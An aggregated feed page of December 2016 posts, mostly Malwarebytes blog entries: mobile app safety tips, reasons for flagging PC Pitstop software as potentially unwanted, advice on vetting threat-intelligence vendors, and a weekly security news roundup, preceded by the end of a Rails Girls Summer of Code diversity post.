This diversity in technology is extremely important. Diverse teams, comprised of people with diversified social identities, benefit from diverse perspectives when solving a problem, often leading to innovation or to the acquisition of a new market. There is also a myriad of examples where lack of diversity in teams or industries had negative repercussions: the Apple watch not working properly for users with tattoos, Flickr’s offensive and racist auto-tagging system, and a 2006 United Nations audit of Web Accessibility showing that out of 100 websites surveyed, only three met the basic standard for accessibility.

With RGSoC, we aim to close the gender gap in tech. While there are many ways to try and do so — workshops, bootcamps, and conferences aimed primarily at women — we have decided to focus on the long-term goal of bringing more women into Open Source, by supporting them with 3-month scholarships to work on an Open Source project in teams of two. Our program doesn’t just support women financially, but also offers a network of mentors, coaches, supervisors, coaching companies and alumnae who give general support and guidance on various topics: code, time management, and self-care. One way in which we measure the success of our program is by how many of our past participants come back to the program (as coaches and mentors) and give back to the community; RGSoC is built on a community of people who care for and support each other and focuses on providing more role models for women learning to code.

As found in many surveys (like the UK-based, GirlGuiding Girls’ Attitudes Survey) and stated in several articles (see Forbes’ recent article on Female execs), role models are exactly what many of the women entering the STEM workforce—or many of the girls considering a career in tech—lack. In spite of this lack of role models and in spite of the stereotype that men are better at technical jobs, in many cases, women tend to outperform men in this field. First Round Capital’s research on 300 portfolio companies showed that female-founded startups do better than all-male startups; so do companies with three or more women in top management functions, according to a 2007 research project by McKinsey&Company. Unfortunately, outperforming in women or members of underrepresented groups is often the result of trying to balance out unconscious bias, so being aware of our own biases and realizing that the above facts exist are only two of the many steps needed to improve our industry for everyone. Because representation is important, we need to break stereotypes—and programs like RGSoC allow us to do so, one edition at a time.

 

Laura Gaetano

Rail Girls Summer of Code

Categories: Techie Feeds

Mobile Menace Monday: Safe Practices with Your Mobile Device

Malwarebytes - Mon, 12/26/2016 - 17:06

‘Tis the season for gift giving, and who wouldn’t be excited about receiving a brand new mobile device! Before you start loading your new device with various apps, here’s a few safe practices to make sure your holidays stay malware-free:

Install apps from safe locations, most notability from the Google Play Store.

Google Play is the safest place by far to install Android apps.

Now I know what some of you are thinking: You wanted an Android device because you’re not restricted to just one app store.

If you must install elsewhere, make sure you do your research and install from highly-rated app stores that have security measures in place to keep it clean from malicious apps.

Many apps can also be installed from the app’s company website. Once again, do your research about the company and its apps before installing.

Check permissions of apps before installing.

This is especially true if you are installing from third-party app markets. Do the permissions seem fitting for what the app needs to function? If that wallpaper app of cute kittens has SMS permissions, you may want to think twice.

If it looks too good to be true, it probably is.

It goes back to the old saying “you get what you pay for”.

There are many popular apps on Google Play for free, but it’s under the agreement that you will have to view advertisements in order to use them. If you’re okay with that, then install away.

Many of these popular apps can also be found on third-party app markets, but be aware that there are shady app markets with apps that contain more than just advertisements.

If you really want a safe and ad-free app, it might just be worth paying the 99 cents and avoid all the hassle.

Protect yourself with a good malware scanner, like Malwarebytes Anti-Malware Mobile.

Call it a shameless plug if you like, but the reality is that malware is becoming more prevalent on mobile devices.

Even with being cautious, malware infections do happen. It’s best to have a layer of protection to stay safe out there. You can find our Malwarebytes Anti-Malware Mobile app on Google Play. And guess what, it’s free of cost and advertisements!

Don’t let the bad guys ruin your fun. Follow these simple tips and keep your Android device safe from infection.

Nathan Collier

Categories: Techie Feeds

Why Malwarebytes detects PC Pitstop as Potentially Unwanted

Malwarebytes - Thu, 12/22/2016 - 16:37

At Malwarebytes, we take great pride in the fact that we’re protecting customers – not just from malware – but from a growing and worrisome threat known as PUPs, or Potentially Unwanted Programs. We recently strengthened our PUP detection criteria due to PUP vendors becoming more aggressive while at the same time using more polished scare tactics to push users into purchasing their products. One company that we started investigating was PC Pitstop. With transparency being important to us at Malwarebytes, the intent of this blog is to make the facts public.

PC Pitstop makes several products including PC Matic, PC Magnum, Optimize, Driver Alert, and Disk MD. As of a few weeks ago, we detect these products as PUP.Optional: the first part representing a Potentially Unwanted Program and the second your optionality, meaning we believe it is unwanted by the majority of users and yet we want it to be clear that it is your discretion as a user to remove it.

PC Pitstop triggered several of our PUP criteria, which I’ve included below.

  1. Claiming that registry cleaning is necessary

Some programs offer to clean or modify your computer’s registry. In basic terms, your Windows registry contains information and settings for programs and hardware installed on users operating systems.

According to Microsoft, registry cleaners are not necessary. In fact, Microsoft itself does not recommend the use of registry cleaners. Products that use registry cleaning and optimization as a feature to drive sales are considered Potentially Unwanted by Malwarebytes.

PC Pitstop’s Optimize & PC Matic products uses registry cleaning as one of its main features. They will show registry issues, even on a brand new computer. It states there are fourteen registry files which “may cause improper operation of some applications.” Based on standards from Microsoft, we believe this to be an aggressive tactic to drive sales.

Figure 1: PC Pitstop’s Optimize showing problems on a brand new machine and prompting users to “Buy Now!” in order to “fix the problems identified.”

Figure 2: PC Matic registry cleaning recommendations.

  1. Claiming that temporary files are problematic

Another one of our PUP detection criteria is flagging temporary files created by the operating system or Internet browser as high risk issues or urgent fixes for a non-savvy user. Temporary files are normal artifacts of the operating system and browser and are in no way indications of a problem with the computer or an issue that is urgent. These detections are normally accompanied by a red dot or risk slider.

PC Pitsop’s PC Matic shows temporary files as urgent issues to the user, even on a brand new computer.

Figure 3: PC Pitstop’s PC Matic showing temporary files, default Operating System settings and disk fragmentation as “issues with your PC” on a brand new machine and prompting users to buy in order to “Fix All.”

  1. Claiming that cookies are problematic

Browser cookies are an integral part of how browsers work. For example, when you buy something online, the shopping cart is more likely than not driven by browser cookies. Flagging browser cookies as an issue that requires immediate attention is an aggressive tactic used by many Potentially Unwanted Programs.

  1. No working trial

During investigation of PC Pitstop products, we were prompted many times (after displaying the aforementioned issues!) to buy the software. There is no working trial and the cost of the product was up to $150. High prices without the ability to trial the software contribute to our criteria around Potentially Unwanted Programs.

  1. Silent removal of necessary applications

One of the most shocking behaviors of PC Matic was the prompt to remove necessary applications such as Google Chrome’s updater, Java’s updater, and more. Removing these components actually puts the machine at risk as both mentioned are patching critical vulnerabilities.

Click to view slideshow.

Figures 4 & 5: PC Matic prompts to remove necessary components that keep applications up to date.

Figure 6: PC Matic showing the Google Chrome Media Router plugin as “Bad”. This plugin ships by default with the standard installation of Google Chrome.

Figure 7: PC Matic disabling the Google Update services, leaving the machine potentially vulnerable and out of date.

  1. Silently disabling the Windows Defragmentation Service

As shown above in figure 2, PC Matic identifies disk fragmentation on a brand new computer and prompts the user to purchase the product. We have found that during installation of PC Matic, one of the first actions it performs is silently disabling the Windows Defragmentation Service. The problem is that Windows Defragmentation Service is no longer just a defragmenter is more of a weekly low-level cleanup of the hard drive for things the operating system tosses around. Microsoft highly suggests leaving this alone for Windows 8 and above. In fact, Microsoft says that stopping this service can do more harm than good.

Once the built-in Windows Defragmentation Service is disabled, PC Matic promotes its “SSD Optimization” feature that shows the Scheduled Defragmentation service as disabled.

Figure 8: PC Matic disabling the Windows Defragmentation Service

Figure 9: PC Matic’s “SSD Optimization” consists of disabling the Microsoft defragment service which Microsoft advises against.

  1. Silently performing other potentially dangerous actions

There are other changes made to the machine running PC Matic fixes that could be potentially dangerous, such as silently adding an administrative user.

Figure 10: PC Matic silently adding an administrative user account to the machine.

  1. High risk security vulnerabilities

On top of all of the behaviors listed above, Malwarebytes has found a series of critical vulnerabilities in PC Pitstop’s products that can allow any attacker to take control of your machine. We advise all PC Pitstop users to immediately uninstall any and all PC Pitstop products from their computers until the vulnerability is resolved. We have sent details of the vulnerabilities found to PC Pitstop so they can address them immediately.

We use our best judgment and a list of criteria we’ve seen abused in the past to determine whether software should be flagged as Potentially Unwanted for our users. No company and no software is perfect, Malwarebytes included. We hope PC Pitstop takes action to remediate the issues listed above, at which point we will immediately stop flagging their products for potential removal. We are humbled that our users trust us to keep them safe and we will aggressively defend our stance against the detection of PC Pitstop’s products until that time.

Categories: Techie Feeds

Malwarebytes teams up with America SCORES

Malwarebytes - Wed, 12/21/2016 - 17:00

Malwarebytes was proud to participate in America SCORES Bay Area’s Corporate Cup this winter. The local non-profit helps provide after school soccer and poetry programs at public schools in low-income communities. We found ourselves front and center to the poet-athletes’ poetry reading and spectated their friendly match up.

As a company we strive to promote healthy living by participating in fitness, nutrition, and mental health challenges. Promoting a healthy and positive lifestyle not only for our company, but supporting the same ideals with America SCORES made it a no brainer to join the tournament. For many of the communities the poet-athletes only have asphalt to play soccer on, which can be dangerous and chaotic. With that challenge they started turning asphalt to turf with their Field of Dreams project.

Malwarebytes is happy to donate to America SCORES Field of Dreams and extends the opportunity to contribute this holiday season. For less than $10 a square foot, they can turn the page on unsafe asphalt playgrounds and create a safe environment for the poet-athletes.

Thank you America SCORES Bay Area and can’t wait for the next tournament!

Christina Lopez

Categories: Techie Feeds

Vetting your vendors: money isn’t everything

Malwarebytes - Tue, 12/20/2016 - 17:00

Over the past year, we’ve seen a handful of cyber threat intelligence vendors sputter out. Some with an effluence of defensive lawsuits, some charged with not really doing much of anything, and one that ended with a dramatic FBI raid and numerous charges of hacking and extortion. What’s concerning from a CSO’s perspective is the veneer of legitimacy all these companies had; scammy cybersecurity companies generally have slick, professional websites, convincing sales engineers, legions of on shore support executives, and almost invariably, one or more executives with ties to a government intelligence agency, whether in the US or abroad. So given that almost all cybersecurity companies on the market strive to project an image of the quiet professional, how can a CSO sort out companies that are a value add from those with a less than legitimate business model? And what about the companies that are above board, but just not very good? Let’s take a look.

The Ugly

Most harmful to a business in the long run are the security vendors who either don’t do much of anything, or have a business model that skirts the edge of the law. The simplest and most cost effective way of avoiding these companies is doing a community temperature check. Bad vendors tend to acquire a collective disapproval in the infosec community long before their business model fails. A quick Twitter or Google search of the vendor name can often reveal detailed accounts by analysts who have used them and can provide candid assessments.

But the gold standard for a temperature check is to ask your own team. Cross-pollination of infosec personnel is at an all time high – as such, your team most likely has a broad range of experience with multiple vendors on a host of platforms. Your team can provide invaluable data, like added operations costs over the long term, company billing practices, and interoperability with existing systems. They can also tip you off on issues with vaporware; generally defined as giving the appearance of having a product which is in reality much more limited or even non-existent.

Like most vendors of higher quality, the ugly will also have former intelligence agency personnel to give themselves a veneer of authority and competence. A question that rarely gets asked, though, is “Which agency?” Is it an agency with a formal mandate for addressing cyber threats, with an established university pipeline and well regarded reputation? Is it an agency whose cyber division was stood up relatively recently, with repurposed employees from other departments? Further, how relevant is that experience to your business needs? If the majority of your security losses are coming from phishing and malvertising, is having access to analysts experienced in state sponsored intrusions really relevant?

The Bad

Some infosec vendors really do try their best to provide a valuable product to the end user…but fall awfully short of the mark most of the time. The problem here isn’t that they’re not trying to deliver a good product – it’s that they don’t necessarily understand what ‘good’ is to you. In the public sector, intelligence is often defined as information that is timely, accurate, and relevant. This applies to cyber threat intelligence as well. If you kick out any one of the legs on the threat intelligence tripod, you’re left with a platform too unstable to make any reliable judgement on cyber risk. An organizational threat delivered to SOC personnel in a timely manner that hasn’t been vetted (i.e. inaccurate), is not intelligence. Threat data that is timely and accurate, but not adapted to your business vertical (i.e irrelevant) is not intelligence. What these things amount to tends to be a drag on organizational resources as in house security personnel get tasked with vetting ever increasing quantities of data that doesn’t address business needs. Don’t those tier two SOC techs have better things to do than retrace vague, un-targeted analysis?

Bad cyber threat intel vendors often correctly identify the desired end goal of intelligence, but lack an understanding of appropriate methodology. Again, these companies often out themselves as undesirable with a quick community check. A poorly sourced, unreviewed report using inflated claims will quickly reveal itself as such as the infosec community reviews the content. Timely, accurate, and relevant threat data will be shared, retweeted, and commented upon much more frequently then less useful sources. Pausing for a moment to see how other organizations have integrated threat data being offered to you can provide a valuable check against letting a bad vendor slip through the cracks.

Some questions to ask the sales engineer:

  • How will this data be tailored to my organization?
  • How is the data delivered to us, and if it’s a portal, what is your upgrade release schedule?
  •  And most importantly: How do you vet your sources?

Note: do not accept “We have to protect our sources and methods.” This is a phrase borrowed from government intelligence, who generally uses it in situations involving threats to human lives. More commonly, it’s used to express sentiments akin to “I’m not going to tell you because I don’t want to, don’t know, or it would embarrass me.”

The Good

Here’s the most difficult category and the holy grail for augmenting your security team: a company that delivers well-targeted services to your organization in a manner that is timely, accurate, and relevant. The catch here is that to properly spot the good company, your own organization has to have timely, accurate, and relevant defined down to a T. This brings us to the last and most important aspect of vetting: metrics.

Certain companies can provide an awfully impressive “real time demonstration” of the product, sometimes offering you a head to head with competing products. They might reference number of threats detected, speed of detections, or analysis, or number of endpoints providing data. There is a barrage of cybersecurity metrics available to benchmark performance, so how do you know which are valuable? The answer is none of them. The only metric relevant to evaluate security performance is that which has been generated by your own team against a mature risk tolerance posture. Vendor metrics can’t possibly address the various risk tolerances of all their customers and therefore can’t be relevant to how they would perform for you. Once you know your own metrics, evaluating vendors can be a piece of cake. (And requires much fewer meetings.)

Some questions to ask the relationship manager for a great vendor:

  • How can I share feedback from my security team?
  • When can we revisit my business needs?
  • What improvements do you have planned for next quarter.

To sum up, vetting vendors doesn’t have to be painful – if you know your risk tolerance posture, and have a mature communication channel with your own security team.

Categories: Techie Feeds

A week in security (Dec 11 – Dec 17)

Malwarebytes - Mon, 12/19/2016 - 20:49

Malwarebytes released our annual list of predictions for the year 2017. We claimed that ransomware will remain king—and personal. We also shared out thoughts on exploit kits, Internet of Things (IoT), password managers, and security in general.

Last week, we homed in on a tech support screen lockers, particularly VinCE, provided opinion on a ransomware campaign that encourages people to infect two more in order for them to get their decryptor, and provided deep analysis on Goldeneye, the rebranded Petya/Mischa partnership.

And finally, we looked into a scam-in-a-box company that offers intelligence leads.

Below are notable news stories and security-related happenings:

  • Exclusive: DHS Says Georgia Hack May Have Been Rogue Employee. “The Department of Homeland Security told members of congress Friday that a rogue federal employee may have been responsible for a November hack-attack that targeted the Georgia secretary of state’s system, LifeZette has learned. On Friday afternoon DHS initiated a conference call with members of Georgia’s congressional delegation to discuss the cyber-attack, a Capitol Hill staffer with knowledge of the call told LifeZette.” (Source: LifeZette)
  • Webroot Sheds Light On The Short, Sharp Lifecycle Of Phishing Websites. “Phishing websites have shorter lifecycles than ever before, but their numbers becoming much more prevalent – and Google, PayPal, Yahoo and Apple are the main targets, according to new Quarterly Web Update findings from Webroot. 84% of phishing sites exist for less than 24 hours, and the average life cycle is less than 15 hours, the company found. However, an average of more than 400,000 phishing sites are cropping up each month, and most of those are hidden within unused domains.” (Source: Security Brief Asia)
  • Yahoo Patches Critical XSS Vulnerability That Would Allow Hackers To Read Any Email. “Yahoo patches critical XSS vulnerability that would allow hackers to read any email – Yahoo, which was in the limelight for revealing a massive hack on its users earlier this year, has fixed a highly critical cross-site scripting (XSS) security flaw in its email system that would have allowed attackers to access any email. The flaw was discovered and reported by Finland-based security researcher Jouko Pynnonen who earned $10,000 for the feat from Yahoo’s bug bounty program. The flaw allowed an attacker to read a victim’s email or create a virus infecting Yahoo Mail accounts among other things.” (Source: The Mirror)
  • Thieves Using Radio Jammers To Prevent Drivers From Locking Their Cars. “British police are warning drivers to check their doors after they use their remote key to lock their car because thieves may be using jammers to block door locking signals, leaving the vehicles unlocked. Thames Valley Police says that thieves have entered and stolen goods from 14 cars parked at motorway (highway) services stations.” (Source: Bleeping Computer)
  • Scammers Can Trick Microsoft Edge Into Displaying Fake Security Warnings. “Hopefully, by now, many readers will be aware of the scam messages that can pop up on your computer screen telling you that your computer may be at risk, and to call a special number for ‘technical support’. Of course, the scam warnings are not legitimate and the person you are calling is not a real Microsoft support engineer. And yet, many computer users have been fooled into making contact, and ended up either with an expensive and unnecessary bill or granting hackers access to their PC. The scams are more successful for the fraudsters the more convincing that their warning appears.” (Source: Bitdefender’s Hot For Security Blog)
  • ‘Proof of Concept’ Project Spawns Three Real-Life Ransomware Families. “Three new and real ransomware families have been spawned by the open-source CryptoWire ransomware project, which is uploaded as a ‘proof of concept’ on GitHub. The original of this ‘educational’ ransomware project was uploaded on GitHub in May this year by an anonymous user. CryptoWire contains a ZIP archive with the ransomware’s course code and a README file, in which the ransomware`s author is advertising their product`s features and capabilities. The project is still available for download.” (Source: Virus Guides)
  • Your Neighborhood ATM May Turn Into A Hacker’s Paradise. “The next time you queue up at the ATM for cash—an experience that has become increasingly onerous since demonetisation— it’s not just the long wait that should worry you. There’s a high probability the cash dispenser runs on software Microsoft stopped supporting more than two years back, thus making it vulnerable to hackers. Card details could be stolen—as they indeed were earlier this year–even as you fret about what to do with the solitary Rs 2,000 note the machine dispenses, if you’re lucky… About 70% of the 202,000 ATM machines in India run on Windows XP, for which Microsoft stopped offering security updates, patches and technical support in April 2014.” (Source: India Times)
  • Malicious Exploit Kit Targeting Internet Explorer Users, On Global Scale. “Researchers at ESET have discovered a new exploit kit spreading through the internet via malicious ads on reputable websites with high traffic. For the last two months, they’ve seen cybercriminals targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Hackers have been attempting to remotely download and execute various types of malware through loophole exploits.” (Source: Security Brief)
  • Scammers Spreading Celebrity Nude PDFs On Facebook, Pushing Malware Installation. “Google Chrome is one of the most used Internet browsers but lately, it is being used by cybercriminals and scammers to infect users with adware, malware and other malicious programs due to the low level of scrutiny on its web store. Recently, an Internet security firm Cyren discovered a malicious Chrome extension spreading nude celebrity PDFs all over the Internet including on Facebook. You might be thinking what’s the big deal about spreading PDFs? Well, that’s just a beginning of an irritating adware and malware campaign.” (Source: Hackread)
  • KFC Website Hacked, Colonel’s Club Loyalty Scheme Members Advised To Change Password. “Call in the Colonel! Popular fast food chain KFC has warned Colonel’s Club loyalty scheme members in the UK that its website has been targeted and multiple accounts may have been compromised. About 1.2 million members of the Colonel’s Club, which allows customers to collect Chicken Stamps and “earn their way to free food rewards,” recently received an email about the breach.” (Source: The International Business Times)
  • Connected Toys And Wearables For Christmas? Could Be A Cyber Security Risk. “ESET is warning consumers about connected gifts this Christmas season, as the popularity for devices such as wearables, connected toys and baby monitors continues to grow. The cyber security specialists warn these types of devices can be easily hacked by e-criminals, or turned into a threat to consumers’ privacy. ESET refers to a complaint that was lodged last week with the US Federal Trade Commission over internet-connected toys recording and transmitting kids’ conversations in violation of privacy rules.” (Source: NetGuide)
  • Nearly Half Of All Websites Pose Security Risks. “According to a new study of the top one million domains, 46 percent are running vulnerable software, are known phishing sites, or have had a security breach in the past twelve months. The big problem is that even when a website is managed by a careful company, it will often load content from other sites, said Kowsik Guruswamy, CTO at Menlo Park, Calif.-based Menlo Security, which sponsored the report, which was released this morning. For example, news sites — 50 percent of which were risky — typically run ads from third-party advertising networks.” (Source: CSO)
  • Zcash Mining Software Covertly Installed On Victims’ Machines. “Software ‘mining’ the recently established Zcash (ZEC) cryptocurrency is being foisted upon unsuspecting users, Kaspersky Lab warns. The actual software is not illegal, and not technically malware – it is meant to be used by individuals who are willing to dedicate their machine(s) and pay for the increased electricity usage that accompanies cryptocurrency mining. Unfortunately, there are unscrupulous individuals looking to get the coins without the cost, and they have been installing the software on users’ computers without permission.” (Source: Help Net Security)
  • Exclusive: SWIFT Confirms New Cyber Thefts, Hacking Tactics. “Cyber attacks targeting the global bank transfer system have succeeded in stealing funds since February’s heist of $81 million from the Bangladesh central bank as hackers have become more sophisticated in their tactics, according to a SWIFT official and a previously undisclosed letter the organization sent to banks worldwide. The messaging network in a Nov. 2 letter seen by Reuters warned banks of the escalating threat to their systems, according to the SWIFT letter. The attacks and new hacking tactics underscore the continuing vulnerability of the SWIFT messaging network, which handles trillions of dollars in fund transfers daily.” (Source: Reuters)
  • DDoS Attacks Have Gone From A Minor Nuisance To A Possible New Form Of Global Warfare. “In September 1996 an internet service provider (ISP) in New York was taken down by a flood of traffic. Computers elsewhere on the internet, controlled by hackers, were sending it up to 150 connection requests every second, far more than it could handle. It was the internet’s first major distributed denial-of-service, or DDoS, attack.” (Source: Quartz)
  • Hackers In Greater China Target Online Transactions, Building ‘Dossiers’ Of Information On Individuals, Expert Says. “Greater China is facing an increasing number of cyberattacks on online transactions, with e-commerce websites being the most vulnerable, according to a recent cybersecurity report. The increasing number of attacks on e-commerce websites come about as the trend of cross-border e-commerce continues to grow, with more consumers shopping online for the best deals, according to cybersecurity firm ThreatMetrix’s Q3 2016 cybercrime report.” (Source: Business Vancouver)
  • Forget The Home, Voice Assistants Are Invading The Workplace. “Much of the headlines about chatbots and digital assistants are focused either on the home or on social media platforms like Slack or Facebook. But what about the office? Are we going to stop talking to each other and start talking to bots? According to Spicework’s Future of IT report – surveying 560 IT pros globally – 19% of businesses are currently using intelligent assistants/chatbots for work-related tasks on company-owned devices, which another 30% are planning to use them in business over the next three years.” (Source: IDG Connect)
  • New Critical Fixes For Flash, MS Windows. “Both Adobe and Microsoft on Tuesday issued patches to plug critical security holes in their products. Adobe’s Flash Player patch addresses 17 security flaws, including one “zero-day” bug that is already actively being exploited by attackers. Microsoft’s bundle of updates tackles at least 42 security weaknesses in Windows and associated software. Half of the dozen patches Microsoft released yesterday earned its “critical” rating, meaning the flaws fixed in the updates could be exploited by malware or miscreants to seize remote control over vulnerable Windows computers without any help from users.” (Source: KrebsOnSecurity)
  • Filmmakers And Journalists To Camera Makers: Add Encryption. “More than 150 documentary filmmakers and photojournalists have a message for the world’s major camera companies: Build encryption features into your still and video cameras. The Freedom of the Press Foundation on Wednesday published an open letter signed by the likes of filmmaker and journalist Laura Poitras, director of the Oscar winning ‘Citizenfour’ and one of the people Edward Snowden first contacted with his NSA leaks, and Alex Gibney, who directed the acclaimed Scientology documentary ‘Going Clear’.” (Source: CNET)
  • ‘Secure the News’ Grades Media Sites On HTTPS—And Most Fail. “Before you enter your credit card into an unknown website, you probably (hopefully) check your browser for the padlock icon that means your connection to that site uses HTTPS encryption, which helps prevent hackers and eavesdroppers. But you probably don’t apply that same perfunctory padlock check to news sites, despite the fact that a media outlet’s lack of encryption can endanger journalists’ sources, expose your reading habits, and even allow censorship and tampering with stories. Now a new, constantly updated encryption ranking site performs that check for you—and may just help push more news organizations to better lock themselves down.” (Source: Wired)
  • Half Of The Web Is Vulnerable To Malware. “Menlo Security, a pioneer of malware isolation, today announced the availability of its State of The Web 2016 report. The surprising results reveal that nearly half (46%) of the Internet’s top 1 million web sites, as ranked by Alexa, are risky.  This is largely due to vulnerable software running on web servers and on underlying ad network domains. The results are significant because risky sites have never been easier to exploit, and traditional security products fail to provide adequate protection. Attackers have their veritable choice of half the web to exploit, allowing them to launch phishing attacks from legitimate sites.” (Source: IT Security Guru)
  • Reschedule The Holiday Party, Patch Tuesday Is Here And It’s A Big One. “Security patches for Windows, Mac OS, iOS and other Apple firmware, and a host of Adobe products, were emitted this week. The final scheduled patch dump of the year sees Microsoft deliver fixes for multiple products, while Apple has security updates for iOS, Mac OS, Safari, and iTunes, and Adobe patches nine products including Flash Player and InDesign.” (Source: The Register)
  • Twitch Rolls Out Automated Tool To Stem Wave Of Chat Harassment. “With messages flying by at speeds literally too fast for a human to read, manual moderation is an uphill battle on some of the most popular Twitch channels. That situation has led to plenty of instances where popular streamers have been deluged with waves of racist or sexist abuse that even quality human moderators can have trouble stemming. Twitch is offering a new tool in the fight against chat room trolls today in the form of AutoMod. Rather than relying on humans to flag and take down inappropriate messages after they’re posted (and quite possibly after the streamer has already read them), AutoMod tries to detect those messages automatically and preemptively send them to a moderation queue for approval or dismissal.” (Source: Ars Technica)
  • Affordable Android Phones Coming With Malware Injected In Stock Firmware. “Russian security company Dr. Web, which also makes a PC antivirus solution bearing the same name, warns that it discovered a total of 26 smartphone models running Android and infected with malware that’s injected in the stock firmware they are shipped with. Most of the models on the list, which you find in full at the end of the article, are smartphones sold on the Russian market and based on the MTK platform, which is a chipset developed by Taiwan-based MediaTek. The list includes phones sold by Prestigio, Irbis, MegaFon, and SUPRA.” (Source: Softpedia)
  • The Human Factor In Information Security. “No one can deny that cyberattacks are the new norm. Such risks will increasingly challenge our ability to operate our businesses. In the world of cybercrime, everyone — from individuals to nation-states — is a target. However, some targets are more alluring than others. Legal, accounting and other professional firms are increasingly targeted by cybercriminals and hackers who are intent on accessing the vast stores of data with which they are entrusted. Indeed, hackers focus a greater percentage of their attacks on the financial services and health care industries than other areas because of the large amounts of data they hold.” (Source: Legal Tech News)
  • Stop Using Netgear Routers With Unpatched Security Bug, Experts Warn. “A variety of Netgear router models are vulnerable to a simple hack that allows attackers to take almost complete control of the devices, security experts warned over the weekend. The critical bug allows remote attackers to inject highly privileged commands whenever anyone connected to the local Netgear network clicks on a malicious Web link, a researcher who uses the online handle Acew0rm reported on Friday. The link, which can be disguised to appear innocuous, then injects a command that routers run as root. The devices’ failure to properly filter out input included in Web requests allows attackers to run powerful shell commands.” (Source: Ars Technica)
  • Uber ‘God View’ Allowed Staff To Spy On High-profile Politicians, Ex-partners And Beyoncé, Court Hears. “Samuel Ward Spangenberg is suing his former employer, minicab firm Uber, claiming that he suffered age discrimination and retaliation after whistle-blowing on some of the company’s practices. As The Center for Investigative Reporting describes, Uber’s former forensic investigator claims that staff regularly snooped on customer records in order to spy on the movements of celebrity customers, ex-partners and spouses. One of those allegedly snooped upon was pop superstar Beyoncé.” (Source: Graham Cluley’s Blog)
  • The Rising Use Of Personal Identities In The Workplace. “90% of enterprise IT professionals are concerned that employee reuse of personal credentials for work purposes could compromise security. However, with 68% saying they would be comfortable allowing employees to use their social media credentials on company resources, Gemalto’s research suggests that personal applications (such as email) are the biggest worry to organisations. The enterprise and consumer worlds are merging closer together, with enterprise security teams under increasing pressure to implement the same type of authentication methods typically seen in consumer services, such as fingerprint scanning and iris recognition. 62% believed this was the case, with 63% revealing they feel security methods designed for consumers provide sufficient protection for enterprises. In fact, 52% believe it will be just three years before these methods merge completely.” (Source: Help Net Security)
  • Insecure Pagers Give Hackers An Entry Way Into Voice Mails, Conference Calls. “All it takes is a $20 dongle and some patience, and an attacker can listen into a company’s pager communications — including transcribed voice mail messages and dial-in instructions for conference calls. There are many voicemail services that automatically transcribe voice mail messages, according to a new report by Trend Micro. In some cases, those messages are forwarded to employees via their pagers.” (Source: CSO)
  • Nymaim Using MAC Addresses To Uncover Virtual Environments And Bypass Antivirus. “Nymaim, a malware family connected to several online ransom campaigns in recent years, is retrieving network card MAC addresses and using them to uncover virtual environments, thwarting automated antivirus analysis tools in the process. Virtualized environments are widely used in large organizations trying to simplify IT by only giving users a thin client, according to SophosLabs researcher Sandor Nemes. It’s also where antivirus researchers deploy the sandboxes they use for automated malware analysis. By going around virtualized environments, Nymaim loses potential targets. But it escapes the automated antivirus sandboxes, which can buy an attacker precious time, Nemes said.” (Source: Sophos’s Naked Security Blog)
  • BugSec, Cynet Discover Critical Flaw Allowing Attackers To Read Private Facebook Messenger Chats. ‘The root of the vulnerability was a cross-origin problem in Facebook’s implementation, which would allow an attacker to bypass Facebook’s origin checks and access messages from an external website. “This security flaw meant that the messages of 1-billion active monthly Messenger users were vulnerable to attackers,’ said Stas Volfus, Chief Technology Officer of BugSec. To exploit the vulnerability, the victim would have to visit a malicious website controlled by the attacker. From that moment, all messages sent or received by the victim would be accessible to the attacker. Said Volfus, ‘This was an extremely serious issue, not only due to the high number of affected users, but also because even if the victim sent their messages using another computer or mobile, they were still completely vulnerable. Facebook realized the potential severity, and responded quickly, verifying the flaw and fixing it.'” (Source: PR Web)
  • Cyber Criminals Are Getting Smarter But Businesses Only Act When Targeted, Experts Warn. “As the dissemination of data and information becomes more and more advanced – the rise of the digital age makes a lot of tasks a whole lot easier, but so does the risk of cyber-attacks. Cyber-attacks can come in many forms, however, the most prevalent target for these criminals are collecting confidential information and stealing money.” (Source: Malaysian Digest)
  • Say Good-bye To Microsoft Security Bulletins. “This is the last month we’ll see security bulletins from Microsoft—and I can’t wait. Patch numbers are currently interlocked, with security bulletins referencing KB numbers that aren’t available in the Windows 10 cumulative updates or in the Windows 7/8.1 security-only or monthly rollup patches. But hang in there, it will get less complicated next month. I hope.” (Source: InfoWorld)
  • Non-Malware Attacks On The Rise, In The Shadow Of Ransomware. “2016 saw attackers holding data for ransom at an alarming rate; but in conjunction with the rise of ransomware and the continued ubiquity of mass malware, attackers are increasingly utilizing non-malware attacks in an attempt to remain undetected and persistent in organizations’ networks. According to Carbon Black data, these non-malware attacks are capable of gaining control of computers without downloading any files and are using trusted, native operating system tools (such as PowerShell) and exploiting running applications (such as web browsers and Office applications) to conduct malicious behavior.” (Source: InfoSecurity Magazine)
  • Hackers Get Around AI With Flooding, Poisoning And Social Engineering. “Machine learning technologies can help companies spot suspicious user behaviors, malicious software, and fraudulent purchases — but even as the defensive technologies are getting better, attackers are finding ways to get around them.Machine learning technologies can help companies spot suspicious user behaviors, malicious software, and fraudulent purchases — but even as the defensive technologies are getting better, attackers are finding ways to get around them. Many defensive systems need to be tuned, or tune themselves, in order to appropriately respond to possible threats.” (Source: CSO)
  • The Economics Of Ransomware Revealed. “70 percent of businesses infected with ransomware have paid ransom to regain access to business data and systems. In comparison, over 50 percent of consumers surveyed said they would not pay to regain access back to personal data or devices aside from financial data, according to IBM Security. IBM X-Force surveyed 600 business leaders and more than 1,000 consumers in the U.S. to determine the value placed on different types of data.” (Source: Help Net Security)
  • The Government Body That Oversees The Security Of Voting Systems Was Itself Hacked. “The U.S. Election Assistance Commission, which is responsible for testing and certifying voting systems, among other things, was hacked around the time of the election, security outfit Recorded Future reports. The EAC confirmed a ‘potential intrusion’ in a statement issued to TechCrunch. This isn’t a smoking gun for a stolen election or anything like that; the EAC doesn’t actually run the elections, nor does it handle voter information. But it is a shameful display all the same, especially considering how loudly and frequently the hacking threat has been bruited by officials this year.” (Source: TechCrunch)
  • Ashley Madison Settles Charges Over Its Massive Data Breach. “Ashley Madison is paying the price for the hack that exposed the info of 36 million customers, and we don’t just mean through executive departures. The owners of the cheat-on-your-spouse site, Ruby Corp, have settled charges from both the US Federal Trade Commission and 13 states alleging that it both misled users and didn’t do enough to protect their info. The actual fine is small — Ashley Madison was intended to pay a total of $17.5 million, but can only afford to pay just over $1.6 million. However, the reforms may go a long way toward solving some of the underlying problems that led to both the breach and shady business practices.” (Source: Engadget)
